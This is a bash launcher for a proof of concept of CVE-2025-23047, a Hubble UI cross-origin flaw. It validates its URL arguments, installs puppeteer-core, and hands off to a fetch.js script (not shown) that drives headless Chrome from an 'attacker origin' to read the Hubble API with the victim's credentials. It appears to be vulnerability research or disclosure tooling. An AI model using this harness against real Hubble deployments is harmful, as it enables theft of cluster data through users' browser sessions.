#!/usr/bin/env bash
# CVE-2025-23047 PoC orchestrator.
# Drives a real headless Chrome (via puppeteer-core) from the attacker origin B
# to perform a credentialed cross-origin fetch against the Hubble UI API on
# origin A, and prints the JSON body the browser was allowed to read.
#
# Args:
#   $1 attacker origin (B)         e.g. http://127.0.0.1:8088
#   $2 api url on hubble origin(A) e.g. http://127.0.0.1:8081/api/cluster
#   $3 chrome executable path      e.g. "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"
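set -euo pipefail

# Print a diagnostic on stderr and stop with the given exit status.
fail() {
  local status=$1
  shift
  printf '[!] %s\n' "$*" >&2
  exit "$status"
}

# All three positional arguments are mandatory; ${N:?msg} aborts with msg when
# one is missing or empty.
ATTACKER_ORIGIN="${1:?attacker origin required}"
API_URL="${2:?api url required}"
CHROME_PATH="${3:?chrome path required}"

# Both URL arguments are passed on to fetch.js, which drives the browser.
# Accept only http(s) so a typo or another scheme is rejected here rather
# than inside Chrome.
for url in "$ATTACKER_ORIGIN" "$API_URL"; do
  case "$url" in
    http://?* | https://?*) ;;
    *) fail 2 "not an http(s) URL: $url" ;;
  esac
done

command -v node >/dev/null 2>&1 || fail 1 "node not found on PATH"

# Run from the script's own directory so node_modules and fetch.js resolve
# the same way regardless of where the caller invoked the script from.
HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
cd "$HERE"

# Checked after the cd above: node is started from $HERE, so a relative
# Chrome path is resolved against that directory, not the caller's.
if [ ! -f "$CHROME_PATH" ] || [ ! -x "$CHROME_PATH" ]; then
  fail 1 "chrome executable not found or not executable: $CHROME_PATH"
fi

# Provision puppeteer-core locally (no Chromium download; we use system Chrome).
if [ ! -d "$HERE/node_modules/puppeteer-core" ]; then
  command -v npm >/dev/null 2>&1 || fail 1 "npm not found on PATH"
  printf '%s\n' "[*] installing puppeteer-core..." >&2
  # puppeteer-core@23 names a major version, so the release that npm resolves
  # (and its transitive dependencies) can differ between runs unless a
  # lockfile sits next to this script. --ignore-scripts keeps lifecycle
  # scripts of whatever gets resolved from running during the install.
  # NOTE(review): puppeteer-core is not expected to need install scripts;
  # confirm, and consider pinning an exact version with a committed lockfile.
  PUPPETEER_SKIP_DOWNLOAD=1 npm install --silent --no-fund --no-audit \
    --ignore-scripts puppeteer-core@23 >&2
fi

# Replace this shell with node so the caller sees fetch.js's exit status and
# stdout directly.
exec node "$HERE/fetch.js" "$ATTACKER_ORIGIN" "$API_URL" "$CHROME_PATH"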
